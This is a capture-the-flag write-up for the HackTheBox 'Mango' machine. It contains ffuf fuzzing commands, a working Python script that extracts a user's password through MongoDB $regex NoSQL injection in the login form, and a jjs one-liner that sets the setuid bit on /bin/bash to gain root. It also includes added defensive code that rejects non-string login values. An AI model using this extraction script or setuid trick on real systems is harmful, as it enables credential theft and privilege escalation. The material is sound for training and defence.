Mango @ HackTheBox

Mango is a 30-point Linux machine on HackTheBox. The foothold is a NoSQL injection in the login form that lets us extract user passwords from a MongoDB database. For root we find jjs, which is owned by root and has the setuid bit set; that lets us run arbitrary Java code as root.

Notes

Fuzzing the webroot:

~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/vendor/FUZZ -fc 403

Installed.json

http://staging-order.mango.htb/vendor/composer/installed.json

MongoDB data extraction:

#!/usr/bin/env python3
# Character-by-character password extraction via the $regex operator.
# Each request asks MongoDB "is there a user 'mango' whose password starts
# with <known prefix + c>?"; a 302 redirect means the login query matched.
import re
import requests
import string

chars = string.ascii_letters + string.digits + string.punctuation
password = ""
url = "http://staging-order.mango.htb/"
done = False

while not done:
    done = True
    for c in chars:
        data = {
            "username": "mango",
            # PHP turns password[$regex] into {"$regex": ...} inside the query
            "password[$regex]": f"^{re.escape(password + c)}.*$",
            "login": "login"
        }
        r = requests.post(url, data=data, allow_redirects=False)
        if r.status_code == 302:
            done = False
            password += c
            print(f"[+] Found {c}")
            break  # restart the scan with the longer prefix
print(f"[+] Password: {password}")
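The application-side fix for this injection, as an added example that is not part of the original write-up or of the box's PHP code: the form parser reproduces how PHP builds `password[$regex]` into a nested array, and the login builder refuses anything that is not a plain string. Function names and the sample bodies are constructed for illustration.

```python
"""Login handling that closes the operator injection used above.

PHP turns the field `password[$regex]=^m.*$` into a nested array, and a
naive MongoDB filter then runs `$regex` as a query operator.  Requiring
plain-string credentials blocks every operator, not just $regex.
Function names are illustrative, not the box's PHP code.
"""
import re
from urllib.parse import parse_qsl

# One level of PHP-style bracket syntax, e.g. password[$regex]
BRACKET = re.compile(r"^([^\[\]]+)\[([^\[\]]*)\]$")


def parse_php_form(body):
    """Parse a urlencoded body the way PHP's $_POST does (one bracket level)."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = BRACKET.match(key)
        if m:
            base, sub = m.groups()
            if not isinstance(form.get(base), dict):
                form[base] = {}
            form[base][sub] = value
        else:
            form[key] = value
    return form


def build_login_filter(body):
    """Return a MongoDB filter for the login request, or raise ValueError.
    Values are wrapped in $eq so they can never act as an operator document.
    (Matching a stored plaintext password in the query is itself what made
    extraction possible; a real app would verify a password hash instead.)
    """
    creds = {}
    form = parse_php_form(body)
    for field in ("username", "password"):
        value = form.get(field)
        if not isinstance(value, str):
            raise ValueError(f"{field} must be a plain string, got {type(value).__name__}")
        creds[field] = {"$eq": value}
    return creds


def login_is_rejected(body):
    """True if build_login_filter refuses the request body."""
    try:
        build_login_filter(body)
    except ValueError:
        return True
    return False
```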

Jjs:

Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()

This post is licensed under CC BY 4.0 by the author.